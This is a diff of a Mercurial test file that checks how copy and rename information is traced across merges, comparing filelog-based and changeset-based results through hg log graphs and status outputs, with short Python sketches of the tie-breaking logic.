- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: merging a change to a file with a "copy overwrite" to that file from another branch
+````````````````````````````````````````````````````````````````````````````````````````````
Merge:
- one with change to a file (d)
@@ -1476,21 +2818,21 @@
$ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))'
- o 29 mGFm-0 simple merge - the other way
+ o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- +---o 28 mFGm-0 simple merge - one way
+ +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Note:
@@ -1504,15 +2846,15 @@
Details on this hash ordering pick:
$ hg manifest --debug 'desc("g-1")' | egrep 'd$'
- f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !)
- 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !)
+ 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !)
+ 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !)
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d
A d
a (no-changeset no-compatibility !)
$ hg manifest --debug 'desc("f-2")' | egrep 'd$'
- 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !)
- fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !)
+ 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !)
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !)
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d
A d
h (no-changeset no-compatibility !)
@@ -1521,15 +2863,22 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")'
A d
- h
+ h (no-filelog !)
+ a (filelog !)
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")'
A d
- a (no-filelog !)
- h (filelog !)
+ a (no-changeset !)
+ h (changeset !)
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")'
M d
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")'
@@ -1543,74 +2892,194 @@
i (no-filelog !)
R i
$ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
#if no-changeset
$ hg log -Gfr 'desc("mFGm-0")' d
- o 28 mFGm-0 simple merge - one way
+ o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mFGm-0")' d
- o 28 mFGm-0 simple merge - one way
- |\
- | o 25 g-1: update d
- | |
- o | 22 f-2: rename i -> d
- |/
- o 2 i-2: c -move-> d
+ o g-1: update d
+ |
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
#if no-changeset
$ hg log -Gfr 'desc("mGFm-0")' d
- o 29 mGFm-0 simple merge - the other way
+ o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mGFm-0")' d
- o 29 mGFm-0 simple merge - the other way
- |\
- | o 25 g-1: update d
- | |
- o | 22 f-2: rename i -> d
- |/
- o 2 i-2: c -move-> d
+ o g-1: update d
+ |
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: new copy information on both side with an actual merge happening
+`````````````````````````````````````````````````````````````````````````
+
+- the "p-" branch renaming 't' to 'v' (through 'u')
+- the "q-" branch renaming 'r' to 'v' (through 'w')
+
+
+ $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))'
+ o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ |\
+ +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ | |/
+ | o q-2 w -move-> v
+ | |
+ | o q-1 r -move-> w
+ | |
+ o | p-2: u -move-> v
+ | |
+ o | p-1: t -move-> u
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+#if no-changeset
+ $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v'
+ 0946c662ef16e4e67397fd717389eb6693d41749 644 v
+ $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v'
+ 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v
+ $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v'
+ 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v
+ $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v'
+ c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v
+ $ hg debugindex v | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * 3f91841cd75c 000000000000 000000000000
+ 1 * c43c088b811f 000000000000 000000000000
+ 2 * 0946c662ef16 3f91841cd75c c43c088b811f
+ 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c
+#else
+ $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v'
+ 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v
+ $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v'
+ a098dda6413aecf154eefc976afc38b295acb7e5 644 v
+ $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v'
+ 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v
+ $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v'
+ a38b2fa170219750dac9bc7d19df831f213ba708 644 v
+ $ hg debugindex v | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * 5aed6a8dbff0 000000000000 000000000000
+ 1 * a38b2fa17021 000000000000 000000000000
+ 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021
+ 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0
+#endif
+
+# Here the filelog based implementation is not looking at the rename
+# information (because the file exists on both sides). However the changelog
+# based implementation works fine. We have different output.
+
+ $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")'
+ M v
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")'
+ M v
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")'
+ M v
+ t (no-filelog !)
+ R t
+ $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")'
+ M v
+ t (no-filelog !)
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")'
+ A v
+ t
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")'
+ A v
+ r
+ R r
+
+# From here, we run status against revisions where both source files exist.
+#
+# The filelog based implementation picks an arbitrary side based on revision
+# numbers. So the same side "wins" whatever the parent order is. This is
+# sub-optimal because depending on revision numbers means the result can be
+# different from one repository to the next.
+#
+# The changeset based algorithm uses the parent order to break ties on
+# conflicting information and will have a different result depending on which
+# parent is p1 and which is p2. That order is stable across repositories.
+# (data from p1 prevails)
+
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")'
+ A v
+ t
+ R r
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")'
+ A v
+ t (filelog !)
+ r (no-filelog !)
+ R r
+ R t
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")'
+ A d
+ a
+ A v
+ r (filelog !)
+ p (no-filelog !)
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")'
+ A d
+ a
+ A v
+ r
+ R a
+ R p
+ R r
+
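The tie-breaking behavior described in the comment above can be modeled in a
few lines of Python. This is an illustrative sketch only, not Mercurial's
implementation; the function names and data shapes are invented for the
example.

  # Two ways to break a tie between conflicting copy information coming
  # from the two parents of a merge (illustrative sketch only):

  def filelog_style_pick(candidates_by_rev):
      """Pick by repo-local revision number: the same side always wins,
      but numbering can differ from one clone to the next."""
      return candidates_by_rev[min(candidates_by_rev)]

  def changeset_style_pick(p1_copy, p2_copy):
      """Pick by parent order: data from p1 prevails, which is stable
      across repositories because parent order is part of the changeset."""
      return p1_copy if p1_copy is not None else p2_copy

  # Example: p1 traced 'v' back to 't', p2 traced it back to 'r'.
  assert changeset_style_pick("t", "r") == "t"
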
Comparing with merging with a deletion (and keeping the file)
-------------------------------------------------------------
@@ -1624,19 +3093,19 @@
copy tracing chain.
$ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))'
- o 31 mGCm-0
+ o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
|\
- +---o 30 mCGm-0
+ +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
'a' is the copy source of 'd'
@@ -1644,11 +3113,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")'
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")'
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")'
A d
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")'
@@ -1669,19 +3144,19 @@
copy tracing chain.
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))'
- o 33 mBC-revert-m-0
+ o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
|\
- +---o 32 mCB-revert-m-0
+ +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
'a' is the copy source of 'd'
@@ -1690,12 +3165,18 @@
M b
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")'
M b
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")'
M b
A d
@@ -1715,31 +3196,37 @@
(the copy information from the branch that was not deleted should win).
$ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
- o 36 mHC-delete-before-conflict-m-0
+ o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
|\
- +---o 35 mCH-delete-before-conflict-m-0
+ +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
| |/
- | o 34 h-1: b -(move)-> d
+ | o h-1: b -(move)-> d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
| |
- o | 2 i-2: c -move-> d
+ o | i-2: c -move-> d, s -move-> t
| |
- o | 1 i-1: a -move-> c
+ o | i-1: a -move-> c, p -move-> s
|/
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")'
A d
b (no-compatibility no-changeset !)
+ A t
+ p
R a
R b
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")'
A d
b
+ A t
+ p
R a
R b
+ R p
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")'
A d
b
@@ -1749,6 +3236,586 @@
b
R b
$ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")'
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")'
+ A t
+ p
R a
+ R p
+
+Variant of previous with extra changes introduced by the merge
+--------------------------------------------------------------
+
+(see case declaration for details)
+
+Subcase: merge has the same initial content on both sides, but the merge introduces a change
+`````````````````````````````````````````````````````````````````````````````````````````````
+
+- the "e-" branch renaming b to f (through 'g')
+- the "a-" branch renaming d to f (through e)
+- the merge add new change to b
+
+ $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))'
+ o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |\
+ +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#if no-changeset
+ $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f'
+ 2f649fba7eb284e720d02b61f0546fcef694c045 644 f
+ $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f'
+ 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f
+ $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
+ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f
+ $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
+ e8825b386367b29fec957283a80bb47b47483fe1 644 f
+ $ hg debugindex f | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * b76eb76580df 000000000000 000000000000
+ 1 * e8825b386367 000000000000 000000000000
+ 2 * 2ff93c643948 b76eb76580df e8825b386367
+ 3 * 2f649fba7eb2 b76eb76580df e8825b386367
+ 4 * 774e7c1637d5 e8825b386367 b76eb76580df
+#else
+ $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f'
+ d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f
+ $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f'
+ 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f
+ $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg debugindex f | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * d3613c1ec831 ae258f702dfe 000000000000
+ 2 * 05e03c868bbc ae258f702dfe 000000000000
+#endif
+
+# Here the filelog based implementation is not looking at the rename
+# information (because the file exists on both sides). However the changelog
+# based implementation works fine. We have different output.
+
+ $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")'
+ M f
+ b (no-filelog !)
+ R b
+ $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")'
+ M f
+ b (no-filelog !)
+ R b
+ $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")'
+ M f
+ d (no-filelog !)
+ R d
+ $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")'
+ M f
+ d (no-filelog !)
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")'
+ A f
+ d
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")'
+ A f
+ b
+ R b
+
+# From here, we run status against revisions where both source files exist.
+#
+# The filelog based implementation picks an arbitrary side based on revision
+# numbers. So the same side "wins" whatever the parent order is. This is
+# sub-optimal because depending on revision numbers means the result can be
+# different from one repository to the next.
+#
+# The changeset based algorithm uses the parent order to break ties on
+# conflicting information and will have a different result depending on which
+# parent is p1 and which is p2. That order is stable across repositories.
+# (data from p1 prevails)
+
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")'
+ A f
+ d
+ R b
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")'
+ A f
+ d (filelog !)
+ b (no-filelog !)
+ R b
+ R d
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")'
+ A f
+ a
+ A t
+ p
+ R a
+ R b
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")'
+ A f
+ a (filelog !)
+ b (no-filelog !)
+ A t
+ p
+ R a
+ R b
+ R p
+
+
+Subcase: merge overwrites common copy information, but with an extra change during the merge
+``````````````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (d) with a rename (from h to i to d)
+
+ $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))'
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ | |/
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")'
+ M b
+ A d
+ h (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+ h (changeset !)
+ h (compatibility !)
+ A t
+ p
+ R a
+ R h
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")'
+ M b
+ A d
+ h
+ A t
+ p
+ R a
+ R h
+ R p
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")'
+ M d
+ h (no-filelog !)
+ R h
+ $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")'
+ M b
+ M d
+ $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")'
+ M b
+ M d
+ i (no-filelog !)
+ R i
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")'
+ M d
+ h (no-filelog !)
+ R h
+ $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")'
+ M b
+ M d
+ $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")'
+ M b
+ M d
+ i (no-filelog !)
+ R i
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mBF-change-m-0")' d
+ o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ |\
+ o : f-2: rename i -> d
+ | :
+ o : f-1: rename h -> i
+ :/
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mBF-change-m-0")' d
+ o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ :
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mFB-change-m-0")' d
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ o : f-2: rename i -> d
+ | :
+ o : f-1: rename h -> i
+ :/
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mFB-change-m-0")' d
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ :
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+
+Subcase: restoring an untouched deleted file, while touching it
+````````````````````````````````````````````````````````````````
+
+Merge:
+- one removing a file (d)
+- one leaving the file untouched
+- the merge actively restores the file to the same content.
+
+In this case, the file keeps on living after the merge. So we should not drop
+its copy tracing chain.
+
+ $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))'
+ o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ |\
+ +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ | |/
+ | o c-1 delete d
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+'a' is the copy source of 'd'
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")'
+ M b
+ A d
+ a (no-compatibility no-changeset !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")'
+ M b
+ A d
+ a (no-compatibility no-changeset !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")'
+ M b
+ A d
+ $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")'
+ M b
+ A d
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")'
+ M d
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")'
+ M d
+
+
+Decisions from previous merges are properly chained with later merges
+----------------------------------------------------------------------
+
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
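
A toy model of the chaining property under test, with names taken from the
test graph above; the code is an illustrative sketch, not Mercurial's
implementation:

  def merge_copies(p1_copies, p2_copies):
      # combine copy information from both parents; on a conflicting
      # entry, data from p1 prevails (see the earlier tie-breaking note)
      merged = dict(p2_copies)
      merged.update(p1_copies)
      return merged

  mAEm = merge_copies({"f": "a"}, {"f": "b"})  # first merge arbitrates: "a"
  mK = {}                                      # unrelated branch, no copies
  assert merge_copies(mAEm, mK)["f"] == "a"    # later merge keeps the pick
  assert merge_copies(mK, mAEm)["f"] == "a"    # regardless of parent order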
+
+The result from mAEm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+
+The result from mEAm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'v' and the arbitration done within "mPQm" and "mQP"
+about that file should stay unchanged.
+
+The result from mPQm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+
+The result from mQPm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v
+ A v
+ r (no-changeset no-compatibility !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v
+ A v
+ r (no-changeset no-compatibility !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v
+ A v
+ r (filelog !)
+ r (sidedata !)
+ r (upgraded !)
+ r (upgraded-parallel !)
+
+
+Subcase: chaining salvage information during a merge
+````````````````````````````````````````````````````
+
+We add more changes on the branch where the file was deleted. Merging again
+should preserve the fact that the file was salvaged.
+
+reference output:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ R a
+ R p
+
+chained output
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+
+Subcase: chaining "merged" information during a merge
+``````````````````````````````````````````````````````
+
+When a non-rename change is merged with a copy overwrite, the merge picks the
+copy source from (p1) as the reference. We should preserve this information in
+subsequent merges.
+
+
+reference output:
+
+ (for details about the filelog pick, check the mFGm/mGFm case)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d
+ A d
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+Chained output
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
